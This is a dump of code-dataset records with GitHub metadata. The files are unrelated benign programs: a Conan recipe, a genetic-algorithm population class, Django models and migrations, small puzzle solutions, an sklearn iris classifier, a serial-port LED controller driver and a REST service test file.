"fPIC": True,
"enable_exceptions": True,
"enable_lto": False,
}
generators = "make"
def requirements(self):
self.requires("fmt/7.1.3")
def validate(self):
if self.settings.os not in ("FreeBSD", "Linux"):
raise ConanInvalidConfiguration(f"Unsupported os={self.settings.os}")
if self.settings.compiler not in ("gcc", "clang"):
raise ConanInvalidConfiguration(f"Unsupported compiler={self.settings.compiler}")
if self.settings.arch not in ("x86_64", ):
raise ConanInvalidConfiguration(f"Unsupported arch={self.settings.arch}")
minimal_cpp_standard = 20
if self.settings.compiler.cppstd:
tools.check_min_cppstd(self, minimal_cpp_standard)
minimum_version = {"gcc": 10, "clang": 12}
compiler = str(self.settings.compiler)
version = tools.Version(self.settings.compiler.version)
if version < minimum_version[compiler]:
raise ConanInvalidConfiguration(
f"{self.name} requires {self.settings.compiler} version {minimum_version[compiler]} or later")
def source(self):
tools.get(**self.conan_data["sources"][self.version], strip_root=True)
def build(self):
# FIXME: should be done in validate (but version is not yet available there)
if tools.Version(self.deps_cpp_info["fmt"].version) < 6:
raise ConanInvalidConfiguration("The version of fmt must >= 6.0.0")
if tools.Version(self.deps_cpp_info["fmt"].version) == "8.0.0" and self.settings.compiler == "clang":
raise ConanInvalidConfiguration("fmt/8.0.0 is known to not work with clang (https://github.com/fmtlib/fmt/issues/2377)")
autotools = AutoToolsBuildEnvironment(self)
env_build_vars = autotools.vars
# Conan uses LIBS, presumably following autotools conventions, while
# the XTR makefile follows GNU make conventions and uses LDLIBS
env_build_vars["LDLIBS"] = env_build_vars["LIBS"]
# fPIC and Release/Debug/RelWithDebInfo etc are set via CXXFLAGS,
# CPPFLAGS etc.
env_build_vars["EXCEPTIONS"] = \
str(int(bool(self.options.enable_exceptions)))
env_build_vars["LTO"] = str(int(bool(self.options.enable_lto)))
autotools.make(vars=env_build_vars)
autotools.make(vars=env_build_vars, target="xtrctl")
def package(self):
self.copy("LICENSE", dst="licenses")
self.copy("*.hpp", src="include", dst="include")
self.copy("*/libxtr.a", src="build", dst="lib", keep_path=False)
self.copy("*/xtrctl", src="build", dst="bin", keep_path=False)
tools.rmdir(os.path.join(self.package_folder, "man"))
def package_info(self):
self.cpp_info.libs = ["xtr"]
self.cpp_info.system_libs = ["pthread"]
bin_path = os.path.join(self.package_folder, "bin")
self.output.info(f"Appending PATH environment variable: {bin_path}")
self.env_info.PATH.append(bin_path)
|
[
"noreply@github.com"
] |
CAMOBAP.noreply@github.com
|
5404d94c2cb141aaa4fa36f139bbfc2f161ce03f
|
a8731ed73a1fbae2d1e490fc8951aa17873aa7d4
|
/iga/population/standard_analysis.py
|
163123558095eccca04cfb007d8470d1031bdae1
|
[] |
no_license
|
juancq/character-evolver
|
452bf84afd52766502fbe6ba6471519d1a7635e1
|
5dcae96916dbfef03cc8f6625e4a4c31fe25224f
|
refs/heads/master
| 2021-01-23T18:08:21.058617
| 2017-05-22T02:08:58
| 2017-05-22T02:08:58
| 129,113
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,637
|
py
|
import nsga_ii
from iga.gacommon import gaParams
import copy
class Population(nsga_ii.Population):
def __init__(self, paramClass, paramDict):
nsga_ii.Population.__init__(self, paramClass, paramDict)
ops = gaParams.getVar('operators')
len_ops = len(ops)
op_prob = 1. / len_ops
for i in xrange(len_ops):
ops[i] = op_prob
self.op_len = len(ops)
print 'ops ', ops
#---------------------------------------#
def userInput(self, user_selection = []):
'''
Takes a list of the indices of the individuals selected
by the user during evaluation, and we save the actual
users on a list, to be used during fitness evaluation.
It is the programmer's responsibility to decide on
the meaning of the user feedback.
'''
# if feedback provided, otherwise the user selection was made
# on the injected individuals
if user_selection:
user_selected = []
ops = gaParams.getVar('operators')
inc_prob = .05
dec_prob = .05 / len(ops)-1
for i in user_selection:
ind = self.subset[i]
user_selected.append(ind)
ind_ops = ind.operators
ind_ops.count(1)
if ind_ops:
for j in xrange(self.op_len):
if ind_ops[j]:
ops[j] = min(ops[j] + 0.05, 0.9)
else:
ops[j] = max(ops[j] - 0.05, 0.1)
print 'ops ', ops
self.user_selected = user_selected
#---------------------------------------#
def nextgen(self):
'''
Create next generation from current population.
'''
best = copy.deepcopy(self.user_selected[0])
newPop = [best]
random = self.params.random
for i in xrange(0, self.popsize-1):
p = self.pop[i]
c1, c2 = self.crossover(p, best)
self.params.mutate(c1)
self.params.mutate(c2)
newPop.extend([c1,c2])
# evaluate children
self.eval(newPop)
new_fronts = self.createFronts(newPop)
self.crowdedDistance(new_fronts)
self.combinepop(new_fronts)
# explicitly copy the user selected individual into
# the next generation and set its rank to the highest
randPos = random.randrange(0, self.popsize)
self.pop[randPos] = copy.deepcopy(self.user_selected[0])
self.pop[randPos].rank = 0
#---------------------------------------#
|
[
"juan@dragonite.(none)"
] |
juan@dragonite.(none)
|
4608f91e2fdbac43339f6c6d31842b17ae0dafae
|
9607f45b501c62d0500536e14d134a1aca0a6982
|
/datum/utils/binary_utils.py
|
298f14ff5da4d3abe55ce11e5906ea9163bdccc3
|
[
"Apache-2.0"
] |
permissive
|
shashank-subex/datum
|
b8fb552d4180ea3ee6345fa6bf4a2620231c7601
|
089b687fc569c8c6ce613349297997c67ce40c7a
|
refs/heads/master
| 2023-05-28T01:00:04.701429
| 2021-06-10T11:13:38
| 2021-06-10T11:13:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,437
|
py
|
# Copyright 2020 The OpenAGI Datum Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Tuple
import tensorflow as tf
def is_binary_image(string: tf.Tensor) -> Tuple[bool, str]:
"""Determine image compression type using a binary string tensor/object.
Args:
string: binary string, can be `tf.Tensor` or python format..
Returns:
a tuple containing a flag denoting whether input string is an image and the corresponding
extension (if its an image, else empty).
"""
if not isinstance(string, (bytes, tf.Tensor)):
raise ValueError(f'Input {string} is not a bytes string or `tf.Tensor`.')
if isinstance(string, tf.Tensor):
string = string.numpy()
if string.startswith(b'\xff\xd8\xff'):
return True, 'jpg'
elif string.startswith(b'\x89\x50\x4e\x47\x0d\x0a\x1a\x0a'):
return True, 'png'
elif string.startswith(b'bm'):
return True, 'bmp'
else:
return False, ''
|
[
"mrinal.haloi11@gmail.com"
] |
mrinal.haloi11@gmail.com
|
62cdd2136986368bbf1b0b11e0bd9c2b67467903
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/ysgbRFTPujx8v37yF_9.py
|
6636e68c4e204f96c2ae4dff5513f35eb4a94f15
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 835
|
py
|
class Triangle:
def __init__(self):
self.r = {1: [1]}
self.last_row = 1
self.last_num = 1
def advance(self):
new_row = self.last_row + 1
nr = [n for n in range(self.last_num+1, self.last_num + new_row + 1)]
self.last_num = nr[-1]
self.last_row += 1
self.r[new_row] = nr
return True
def advance_to_row(self, row_goal):
while self.last_row < row_goal:
self.advance()
return True
def advance_to_num(self, num_goal):
while self.last_num < num_goal:
self.advance()
return True
def search_by_row(self, row):
return self.r[row]
def search_by_num(self, num):
return self.r[[k for k in self.r.keys() if num in self.r[k]][0]]
t = Triangle()
t.advance_to_row(1000)
def row_sum(n):
return sum(t.search_by_row(n))
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
957e5920703f3c85f244e9d1b7a3969fb8b9b5b2
|
b3586235dc1e1acbd49fab996f581269a808480b
|
/sistema/producao/migrations/0102_bobine_diam.py
|
b042cee2ccaad255cc483cecad77993e16a08807
|
[] |
no_license
|
gonfersilva/Sistema
|
37ad1cd03dfbb7889fa0b0367c6ebd9044712ae3
|
4c6d9ade22040972efbe892eae0130939d7b5c46
|
refs/heads/master
| 2021-10-23T23:21:51.262723
| 2021-10-13T19:45:49
| 2021-10-13T19:45:49
| 155,545,680
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 452
|
py
|
# Generated by Django 2.2.7 on 2020-06-16 15:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('producao', '0101_auto_20200616_1506'),
]
operations = [
migrations.AddField(
model_name='bobine',
name='diam',
field=models.DecimalField(blank=True, decimal_places=2, max_digits=10, null=True, verbose_name='Diametro'),
),
]
|
[
"goncalo.silva@elastictek.com"
] |
goncalo.silva@elastictek.com
|
0d0efe5aebd2fc8deddd6b033513330081a63629
|
72cdc45a345fe47c525468ff82ef8ce845d9f800
|
/Python/django_ajax/ajax_post/app/models.py
|
db2ea4bd5133f6de68fbf6b39f46e364a5fbe072
|
[] |
no_license
|
bopopescu/Coding-Dojo-assignments
|
474242e14371e729b5948602ffc0a9328f1e43cb
|
0598d7162b37d9472c6f1b82acc51d625ac871ca
|
refs/heads/master
| 2022-11-23T18:55:36.393073
| 2018-07-20T07:43:56
| 2018-07-20T07:43:56
| 281,670,452
| 0
| 0
| null | 2020-07-22T12:24:30
| 2020-07-22T12:24:30
| null |
UTF-8
|
Python
| false
| false
| 414
|
py
|
from django.db import models
# Create your models here.
class NoteManager(models.Manager):
def create_note(self,post_data): self.create(note=post_data['note'])
def notes_rev(self): return self.all().order_by('-id')
class Note(models.Model):
note = models.TextField()
create_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
obj = NoteManager()
|
[
"gringojaimes20@gmail.com"
] |
gringojaimes20@gmail.com
|
037fc634a6c96cca0b1264ed15b267b1d4a37fa3
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_116/2243.py
|
3f2ecb9e374f1d2bd6ced2658ba82fc35ee1861b
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,156
|
py
|
# 0123
# 0 ....
# 1 ....
# 2 ....
# 3 ....
class Game:
def __init__(self, size = 4):
self.size = 4
self.rows = { 'X': 0, 'O': 0 }
self.columns = {}
self.columns['X'] = [True] * size
self.columns['O'] = [True] * size
self.diagonals = {'X': [True, True], 'O': [True, True]}
self.empty = 0
self.result = None
def add_empty(self):
self.empty += 1
def add_to_row(self, symbol):
self.rows[symbol] += 1
def discard_diagonal(self, symbol, i, j):
if i == j:
self.diagonals[symbol][0] = False
if (self.size - i - 1) == j:
self.diagonals[symbol][1] = False
def discard_column(self, symbol, column):
self.columns[symbol][column] = False
def discard_row(self, symbol):
self.rows[symbol] = 0
def check_and_clean_rows(self):
for symbol in self.rows.keys():
if self.rows[symbol] == self.size:
self.result = symbol
self.rows[symbol] = 0
def game_over(self):
if not self.result:
for symbol in self.columns.keys():
if any(self.columns[symbol]):
self.result = symbol
break
for symbol in self.diagonals.keys():
if any(self.diagonals[symbol]):
self.result = symbol
break
if not self.result:
if self.empty:
self.result = 'N'
else:
self.result = 'D'
def print_result(self, game_count):
if self.result in ('X', 'O'):
print "Case #%i: %s won" % (game_count, self.result)
elif self.result == 'D':
print "Case #%i: Draw" % (game_count)
elif self.result == 'N':
print "Case #%i: Game has not completed" % (game_count)
def get_stats(input):
n = int(input.readline().strip())
counts = {}
other = { 'X': 'O', 'O': 'X' }
g = Game()
game_count = 1
i = 0
j = 0
while game_count <= n:
line = input.readline().strip()
i = 0
for cell in line:
if cell == 'T':
g.add_to_row('X')
g.add_to_row('O')
elif cell == '.':
g.discard_column('X', i)
g.discard_column('O', i)
g.discard_diagonal('X', i, j)
g.discard_diagonal('O', i, j)
g.add_empty()
elif cell in ('X', 'O'):
g.add_to_row(cell)
g.discard_row(other[cell])
g.discard_column(other[cell], i)
g.discard_diagonal(other[cell], i, j)
i += 1
g.check_and_clean_rows()
j += 1
if j >= g.size:
g.game_over()
if g.result:
g.print_result(game_count)
if i == 0: input.readline()
while input.readline().strip(): pass
g = Game()
game_count += 1
i = 0
j = 0
if __name__ == '__main__':
import sys
get_stats(sys.stdin)
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
1fa634ea7182b12e6ce9021f8050dcc3492d90b5
|
fe3ecb9b1ddd8de17b8cc93209134f86cd9c4a6f
|
/4_Python_ML/chap06_Regression/lecture/step01_regression.py
|
9dd4e34d1e6a6aed096bba40c35b13ede650b6d2
|
[] |
no_license
|
nsh92/Bigdata-and-Machine-Learning-Education-at-ITWILL
|
d1a7292ee4865a3d0c664dd6ecf3afc0d6325847
|
3cb5661001597499178a2c85f4ccf70dcf0855d6
|
refs/heads/master
| 2022-11-21T23:10:51.421708
| 2020-07-23T12:49:11
| 2020-07-23T12:49:11
| 275,540,204
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,471
|
py
|
# -*- coding: utf-8 -*-
"""
회귀방정식에서 기울기와 절편 식
기울기 = Cov(x,y) / Sxx(x의 편차 제곱의 평균)
절편 = y_mu - (기울기 * x_mu)
"""
from scipy import stats # 회귀모델
import pandas as pd
galton = pd.read_csv('C:/ITWILL/4_Python-II/data/galton.csv')
galton.info()
'''
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 928 entries, 0 to 927
Data columns (total 2 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 child 928 non-null float64
1 parent 928 non-null float64
'''
# 부모의 키X가 자녀의 키Y에 미치는 영향
x = galton['parent']
y = galton['child']
model = stats.linregress(x, y)
# slope=0.6462905819936423, intercept=23.941530180412748,
# rvalue=0.4587623682928238, pvalue=1.7325092920142867e-49, stderr=0.04113588223793335
# rvalue : 부모의 키가 모든 것을 결정하지 않는구나
# Y = x*a + b
y_pred = x*model.slope + model.intercept
y_pred
y_true = y
# 예측치 vs 관측치(정답)
y_pred.mean()
y_true.mean() # 먼저 평균 비교 : 매우 유사
# 기울기 계산식
xu = x.mean()
yu = y.mean()
Cov_xy = sum((x-xu) * (y-yu)) / len(x)
Sxx = np.mean((x-xu)**2)
slope = Cov_xy / Sxx # 0.6462905819936413
# 절편 계산식
incept = yu - (slope * xu) # 23.94153018041171
# 설명력 rvalue
galton.corr() # 0.458762 : 이게 걍 rvalue구만
y_pred = x * slope + incept
y_pred.mean() # 68.08846982758423
|
[
"totols1092@gmail.com"
] |
totols1092@gmail.com
|
48421324896cdf92d22394ec3216d8ebde4bb512
|
cbedb18df0aaac810aeea87a2273edb15c1cf899
|
/Strings/49. Group Anagrams(3).py
|
376bd9d635f4dd8b8830d8cec0f586ee7d9eeefc
|
[] |
no_license
|
kanglicheng/CodeBreakersCode
|
71b833bb9f4c96d520c26f0044365dc62137a940
|
31f7f730227a0e10951e7468bad1b995cf2eafcb
|
refs/heads/master
| 2023-08-07T20:32:05.267695
| 2020-09-14T14:36:25
| 2020-09-14T14:36:25
| 265,978,034
| 0
| 0
| null | 2020-05-22T00:05:29
| 2020-05-22T00:05:29
| null |
UTF-8
|
Python
| false
| false
| 960
|
py
|
# not sure about the solution at start
# sort each str => O(W logW), w is the length of each words -> O(N * W log W) or counting sort O(N*W)
# turn each word into count char list: each list length is fixed:26 -> need O(W) to turn to list
# but lst can't hash -> turn to str then use hash map
class Solution:
def groupAnagrams(self, strs: List[str]) -> List[List[str]]:
def toCountString(w):
lst = [0] * 26
for c in w:
lst[ord(c) - ord('a')] += 1
res = []
for i in range(0, 26):
res.append(str(lst[i]))
res.append("|")
return "".join(res)
d = {}
for w in strs:
countStr = toCountString(w)
if countStr in d:
d[countStr].append(w)
else:
d[countStr] = [w]
return list(d.values())
|
[
"56766457+Wei-LiHuang@users.noreply.github.com"
] |
56766457+Wei-LiHuang@users.noreply.github.com
|
706004ded5504282ced7c31b8a3c251769a0d8c8
|
b00330d48bfe09da78e50694a72793fe128c6a01
|
/27_머신러닝_붓꽃 품종 학습.py
|
e10c7892374db24c3f940ab357d31d34b02b1683
|
[] |
no_license
|
swj8905/2021_Hongik_Summer
|
c177d64c6f0326f00d974e20e1334d8ac0ede3e4
|
e3c28d1bfeb4d6a55b152bd922b61b77a17bb84c
|
refs/heads/master
| 2023-06-16T00:47:15.852607
| 2021-07-08T12:01:31
| 2021-07-08T12:01:31
| 378,916,618
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 621
|
py
|
from sklearn.svm import SVC
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
# 데이터 불러오기
df = pd.read_csv("./iris.csv")
label = df["variety"]
data = df[["sepal.length", "sepal.width", "petal.length", "petal.width"]]
train_data, valid_data, train_label, valid_label = train_test_split(data, label)
# 학습시키기
model = SVC() # Support Vector Machine Classifier
model.fit(train_data, train_label)
# 예측시켜보기
result = model.predict(valid_data)
# 정확도 확인하기
score = accuracy_score(result, valid_label)
print(score)
|
[
"swj8905@naver.com"
] |
swj8905@naver.com
|
3beaca888a36dc002b9fa618283aacf86d72d4a1
|
e7b20ed87e8402bb8f55f0bf2b91824c264e07b4
|
/pyhypnolsd/hypnolsd.py
|
76420c7b4a25359320b46780ee95a1c1dcd98b44
|
[
"Unlicense"
] |
permissive
|
rclough/pyHypnoLSD
|
1ebe10929e6067e219851239f6e5a27fafcdb4b4
|
6d8c0539633d47c7e59368fcc849ca9b79ac6db4
|
refs/heads/master
| 2016-09-05T16:51:15.803912
| 2014-02-14T21:27:58
| 2014-02-14T21:27:58
| 16,823,888
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,016
|
py
|
"""
Module that contains various functions, constants, and tools
for interacting with a hypnoLSD object
"""
import sys, serial
###############################################################################
# Constants
###############################################################################
NATIVE_BAUD = 9600
MAX_BAUD = 12000000
COMMAND_MODE = 0
DRAW_MODE = 1
READLINE_TIMEOUT = 0.5
SYNC_BYTE = b'0xFE'
###############################################################################
# Utility methods
###############################################################################
def baud_from_divisor(divisor):
"""
Returns the baud rate, given a divisor.
Parameters
----------
divisor : int
baud rate divisor for the HypnoLSD. See HypnoLSD
docs for more details
"""
return MAX_BAUD / (int(divisor)+1)
def divisor_from_baud(baud) :
"""
Returns the divisor, given a baud rate. ints only please
Parameters
----------
baud : int
baud rate you'd like to operate at, and need the divisor
for to set speed on the HypnoLSD
"""
return int(MAX_BAUD/int(baud))-1
###############################################################################
# HypnoLSD class
###############################################################################
class HypnoLSD:
"""
Class meant to symbolize a single HypnoLSD module. Tracks the state
of the module so that it may be used by different convenience interfaces,
or used directly.
By default, demo is turned off because it is useless when programming.
"""
def __init__(self, port, baudrate=NATIVE_BAUD):
# Initialize internal variables
self.mode = COMMAND_MODE
# Initialize serial connection
self.serial = serial.Serial(port=port, baudrate=NATIVE_BAUD, timeout=READLINE_TIMEOUT)
self.serial.close()
self.serial.open()
# Turn off demo mode
self.demo_off()
# Update baud rate if necessary
if baudrate != NATIVE_BAUD:
self.change_baudrate(baudrate)
def change_baudrate(self, baudrate):
""" Change the baud rate used to speak to HypnoLSD """
if baudrate == self.serial.baudrate:
return ["Baudrate already set to " + str(baudrate)]
divisor = divisor_from_baud(baudrate)
return self.change_divisor(divisor, baudrate)
def change_divisor(self, divisor, baudrate=False):
""" Change the baud rate divisor on the HypnoLSD """
if not baudrate:
baudrate = baud_from_divisor(divisor)
if baudrate == self.serial.baudrate:
return ["Baudrate already set to " + str(baudrate)]
# Send command
response = self.send_command("set speed " + str(divisor))
self.serial.flush() # Flush command so we can read output with new baud rate
self.serial.baudrate = baudrate
return response
def send_command(self, command, override=False, print_it=False):
"""
Send a command to HypnoLSD, only available in Command Mode
Parameters
----------
command : string
Command to send to HypnoLSD, with no return chars
override : boolean (optional)
Set true if you want to switch modes (if currently in draw mode)
so you can send the command.
resp : boolean (optional)
Set true if you want to return the response (list of strings)
"""
# Check modes
if self.mode == DRAW_MODE and not override:
print "Currently in Draw Mode, cannot execute commands"
return
elif self.mode == DRAW_MODE and override:
self.draw_mode()
# Execute command
self.serial.write(command+"\r\n")
return self.get_response(print_it)
def get_response(self, print_it=False, break_on_OK=True):
"""
Get one HypnoLSD response, a list of lines.
Parameters
----------
print_it : boolean (optional)
Print the output to stdout
break_on_OK : boolean (optional)
If set true, it will only print up to the last "OK".
This can speed up program flow if you are retrieving responses
for each command you send. When set to false, it will spit out
everything available for it to spit out.
"""
response = []
has_serial = True
while has_serial:
# Keep reading lines from serial until you timeout
from_serial = self.serial.readline()
if not from_serial:
has_serial = False
else:
response.append(from_serial.strip())
if print_it:
sys.stdout.write(from_serial)
if break_on_OK and from_serial == "OK\r\n":
break
if print_it:
sys.stdout.flush()
return response
def command_mode(self):
""" Put HypnoLSD in Command Mode """
self.serial.write(SYNC_BYTE+SYNC_BYTE)
self.mode = COMMAND_MODE
def draw_mode(self):
""" Put HypnoLSD in Draw Mode """
if self.mode == DRAW_MODE:
return
self.send_command("draw")
self.mode = DRAW_MODE
def demo_off(self):
""" Turn off demo mode. Useless when coding. """
self.send_command("demodelay 0")
self.get_response(break_on_OK=False) # swallow response
def close(self):
""" Close connection to HypnoLSD """
self.change_baudrate(NATIVE_BAUD)
self.serial.close()
def flush(self):
""" Flush inputs and outputs of device """
self.serial.flush()
|
[
"root@beaglebone.(none)"
] |
root@beaglebone.(none)
|
40b38c9d62305e2dc9eb496685175c25a2a73a41
|
21dd7d56c370ea9a02b66654525fd96a398a9e49
|
/apps/competition/urls.py
|
8fda71942b35148c142e463894bd46fdd17e9acf
|
[] |
no_license
|
hqpr/fame
|
fdad5d03bf9ee7ca31ae8a4701ff05bafd49540f
|
8b77e3a822ae70ee6d79a8003e1d9f9bc5ba8355
|
refs/heads/master
| 2023-01-14T16:58:46.533090
| 2015-08-31T15:37:09
| 2015-08-31T15:37:09
| 35,205,330
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,243
|
py
|
from django.conf.urls import url
from apps.competition.views import competitions, single_competition, single_competition_terms, pick_media_file, SingleCompetitionEnter, \
competition_add_audio, competition_add_video, entry_review
urlpatterns = [
url(r'^$', competitions, name='all_competitions'),
url(r'^(?P<slug>[\w\-]+)/$', single_competition, {"display": "overview"}, name='single_competition'),
url(r'^(?P<slug>[\w\-]+)/chart/$', single_competition, {"display": "chart"}, name='single_competition_chart'),
url(r'^(?P<slug>[\w\-]+)/entry/(?P<entry_slug>[\w\-]+)$', single_competition, {"display": "chart"}, name='single_competition_entry'),
url(r'^(?P<slug>[\w\-]+)/terms/$', single_competition_terms, {"display": "terms"}, name='single_competition_terms'),
url(r'^(?P<slug>[\w\-]+)/enter/$', SingleCompetitionEnter.as_view(), name='single_competition_enter'),
url(r'^(?P<slug>[\w\-]+)/pick/$', pick_media_file, name='pick_media_file'),
url(r'^add/(?P<object_id>\d+)/$', competition_add_audio, name='competition_add_audio'),
url(r'^add/video/(?P<object_id>\d+)/$', competition_add_video, name='competition_add_video'),
url(r'^(?P<slug>[\w\-]+)/review/$', entry_review, name='entry_review'),
]
|
[
"adubnyak@gmail.com"
] |
adubnyak@gmail.com
|
5181e499b3220d7aa79460e74c4d532b634fb8bc
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/QgAwpaFWD2jtxZ2wG_8.py
|
c19c34476af79ec15c2595c52b9b91290b20f82c
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 358
|
py
|
"""
Given an integer `n`. Your task is to find how many digits this integer
contains without using `str` or `len` methods!
### Examples
sum_digits(100) ➞ 3
sum_digits(1000) ➞ 4
sum_digits(1) ➞ 1
### Notes
N/A
"""
def sum_digits(n):
count=0
if n==0:
return 1
while n!=0:
n//=10
count+=1
return count
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
f5ef2c723c317a80eb8cad3ed47da968f1411d5f
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/adjectives/_inferiors.py
|
acab87363dd1d78f2b03e3b0fd1313fda1eeab3e
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 262
|
py
|
from xai.brain.wordbase.adjectives._inferior import _INFERIOR
#calss header
class _INFERIORS(_INFERIOR, ):
def __init__(self,):
_INFERIOR.__init__(self)
self.name = "INFERIORS"
self.specie = 'adjectives'
self.basic = "inferior"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
d812823dcc5f741c075b136a22be8928175d68e6
|
5388e00d992050d515f72666e2f76c51b2ca56ee
|
/calc_angle_between_two_locs.py
|
424c037ae9233d5870ce13b03f901b6b13ad4281
|
[
"Apache-2.0"
] |
permissive
|
lonecrane/PyGuymer3
|
df9ffc62d4f7fddf04ae3ea18f5487dec48472c7
|
c7eb017dac18abb5eafe74e23a93bf7e68e48916
|
refs/heads/master
| 2020-09-11T23:44:14.036051
| 2019-11-20T07:01:22
| 2019-11-20T07:01:22
| 222,229,475
| 0
| 0
|
Apache-2.0
| 2019-11-17T10:13:51
| 2019-11-17T10:13:51
| null |
UTF-8
|
Python
| false
| false
| 1,049
|
py
|
def calc_angle_between_two_locs(lon1_deg, lat1_deg, lon2_deg, lat2_deg):
"""
This function reads in two coordinates (in degrees) on the surface of a
sphere and calculates the angle (in degrees) between them.
"""
# Import modules ...
import math
# Convert to radians ...
lon1_rad = math.radians(lon1_deg) # [rad]
lat1_rad = math.radians(lat1_deg) # [rad]
lon2_rad = math.radians(lon2_deg) # [rad]
lat2_rad = math.radians(lat2_deg) # [rad]
# Calculate angle in radians ...
distance_rad = 2.0 * math.asin(
math.hypot(
math.sin((lat1_rad - lat2_rad) / 2.0),
math.cos(lat1_rad) * math.cos(lat2_rad) * math.sin((lon1_rad - lon2_rad) / 2.0)
)
) # [rad]
# Return angle ...
return math.degrees(distance_rad)
|
[
"t.m.guymer@thomasguymer.co.uk"
] |
t.m.guymer@thomasguymer.co.uk
|
6f659c63d644601207b26f69956c91a1acf67b0c
|
8734446b29c3424e25ef82c3ba65db61f1736a12
|
/prngmgr/migrations/0007_auto_20161008_1643.py
|
1ea7a65c037d1ef783856208172d4c2c0bbe84f8
|
[
"Apache-2.0"
] |
permissive
|
decolnz/prngmgr
|
25ef02a3c76c00864009c6470d532805a5b52af3
|
6ea19e0095c123d337e523f3c832f5688254c7f1
|
refs/heads/master
| 2021-01-19T00:51:26.798203
| 2016-10-11T09:16:04
| 2016-10-11T09:16:04
| 87,213,736
| 1
| 0
| null | 2017-04-04T17:05:25
| 2017-04-04T17:05:25
| null |
UTF-8
|
Python
| false
| false
| 435
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('prngmgr', '0006_auto_20161008_1336'),
]
operations = [
migrations.AlterField(
model_name='peeringsession',
name='previous_state',
field=models.CharField(default=b'None', max_length=12),
),
]
|
[
"benm@workonline.co.za"
] |
benm@workonline.co.za
|
5bfde6f4620ebb1cad3fa1035a1c961d7bfff609
|
c25be81a90291c9dd7eed076509729b1c730531e
|
/tests.py
|
93f031029fc25e60902294dba580f390e688262c
|
[
"Apache-2.0"
] |
permissive
|
icYFTL/RTULAB_Service
|
8707b7f9082494e7513c6afc0e4ede89f18cc320
|
a16d0fc2ac9ac103f0a14e90824caded7156bf11
|
refs/heads/main
| 2023-03-18T15:26:56.586261
| 2021-03-18T09:23:30
| 2021-03-18T09:23:30
| 343,216,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,017
|
py
|
import requests
import unittest
class Test(unittest.TestCase):
def setUp(self) -> None:
self.__host = 'https://rulab.icyftl.ru/'
self.__purchases_host = self.__host + 'purchases'
self.__shop_host = self.__host + 'shop'
self.__factory_host = self.__host + 'factory'
self.__shop_password = 'lol'
def test_upstate(self):
try:
shop_state = requests.get(self.__shop_host).status_code
purchases_state = requests.get(self.__purchases_host).status_code
factory_state = requests.get(self.__factory_host).status_code
self.assertEqual(shop_state, 200)
self.assertEqual(purchases_state, 200)
self.assertEqual(factory_state, 200)
except Exception as e:
raise AssertionError('Some services are down or something went wrong\n' + str(e))
def test_create_shop(self):
try:
shop = requests.post(self.__shop_host + '/create', json={
"name": "UTest",
"address": "UTest",
"number": "79167031312"
}, headers={'XXX-CODE': self.__shop_password})
self.assertEqual(shop.status_code, 201)
except:
raise AssertionError('Shop service is down or something went wrong')
def test_add_items(self):
try:
shop = requests.put(self.__shop_host + '/1/add_items', json={
"items": [
{
"name": "TestCake",
"category": "TestCakes",
"count": 100
}
]
}, headers={'XXX-CODE': self.__shop_password})
